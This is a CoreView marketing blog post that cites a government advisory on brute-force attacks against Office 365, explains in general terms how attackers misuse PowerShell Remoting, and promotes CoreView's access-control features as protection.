Earlier this month, the NSA, CISA, FBI, and NCSC released a joint advisory about the continuous, targeted attacks on organizations using Microsoft Office 365 cloud services.
Specifically, the advisory noted an increased number of brute force attacks on email and user accounts within the Microsoft Office 365 space. While all Microsoft Office 365 organizations are technically at risk, there’s also a heightened threat to those in hybrid environments within sectors like government, defense, energy, and higher education.
So, what does this mean for IT administrators? What steps should they take to protect their networks and organizations from potential harm? And what does PowerShell access have to do with all of this?
Allow us to explain.
First things first: what is PowerShell? PowerShell is a scripting and automation platform. As Microsoft explains, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework.” It runs on Windows, Linux, and macOS.
In essence, PowerShell is made up of a collection of commands, or Cmdlets (Command-lets), designed to carry out specific functions and tasks. It’s built to help ease the administration of systems, empowering IT professionals and administrators to run and execute commands across a number of servers simultaneously. It can also automate administrative tasks, ranging from the common to the complex (e.g. enabling and disabling features, viewing all USB devices installed in a system, or even launching a new server).
Remote PowerShell access — also known as “PowerShell Remoting” — allows administrators to connect to, and run commands on, servers that are not in their physical location. It enables them to remotely and automatically manage multiple servers at once.
The aim is to save time and resources, but — if left unchecked and unmanaged — the risks of remote PowerShell access are magnified, as highlighted by the recent advisory.
We’re glad you asked.
The ease with which PowerShell allows administrators to automate and execute tasks from afar is also what makes it so attractive to cybercriminals. Once they’ve entered a network, PowerShell grants cybercriminals access to the full command line, thus giving them access to that network’s stored data as well as its remote and local operating systems. From there, bad actors are able to embed and run malicious commands across the network, often flying under the radar and evading security scans (as these commands look like they were legitimately put in place by administrators).
Yikes is right. But if you’re an administrator wondering how to protect against PowerShell attacks and how to mitigate IT security risks, you’ve come to the right place. Here are three pro tips.
Microsoft offers a number of tools for security administration — from Microsoft Defender to Microsoft Secure Score — which help you assess, detect, and ultimately prevent cyber-attacks (in PowerShell and beyond). That said, they’re spread out across a plethora of platforms and interfaces, making them difficult to track and manage.
CoreView (that’s us!) protects and optimizes Microsoft 365 and other SaaS environments. Our platform extends the Microsoft Admin Centers and provides a single bird’s eye view of them all, giving administrators the capacity to quickly and easily manage multiple systems and tools, including security administration and risk assessment. Better yet, CoreView provides automated alerts for security compliance issues on a real-time basis.
(Not to brag, but one U.S. enterprise organization reported that CoreView had saved their IT team more than 1,000 hours last year when researching and analyzing security-related incidents, if you’re also wondering how to save IT administrators time while reducing risk.)
When it comes to PowerShell specifically, the number one step you should take to boost protection is limiting who has remote access. Fortunately, CoreView offers administrators Functional Access Control, or FAC, of Microsoft programs, providing more granular, laser-focused control over who can do what.
As CoreView’s Solution Architect, Matt Smith, explained it — “CoreView’s [Functional Access Control] is checkbox-based. IT can give someone the ability to forward email addresses by clicking two boxes. It is automatically scoped, which is hard to do in the Microsoft world without creating a custom role and creating a custom scope – and frankly, nobody does that… I can also give somebody at the help desk the ability to forward emails to people who are on long-term leave in the accounting department. Boom. We are done.”
CoreView also has a feature called Virtual Tenant, letting administrators segment someone’s visibility by location, region, department, or any other Active Directory attribute. It helps you ensure that someone is able to access exactly the systems, and perform exactly the tasks you’d like them to (e.g. “Person X in Location Y is the only one who can execute Task Z via CoreView”).
Additionally, CoreView Custom Actions for Microsoft Office 365 PowerShell Commands allow administrators to secure accounts with a single CoreView service account (which leverages Azure Key Vault services and users’ own Conditional Access policies), making your network and organization significantly less vulnerable to cyber-attacks.
How so? Conditional Access policies essentially function like “if-then” statements (e.g. “If a user wants to access service X, then they must perform action Y”). In Microsoft’s words, “you can apply the right access controls when needed to keep your organization secure and stay out of your user’s way when not needed” with Conditional Access.
Using CoreView, you can ensure these policies are translated and carried out across accounts, systems, and services, including PowerShell. Learn more with a personalized CoreView demo today.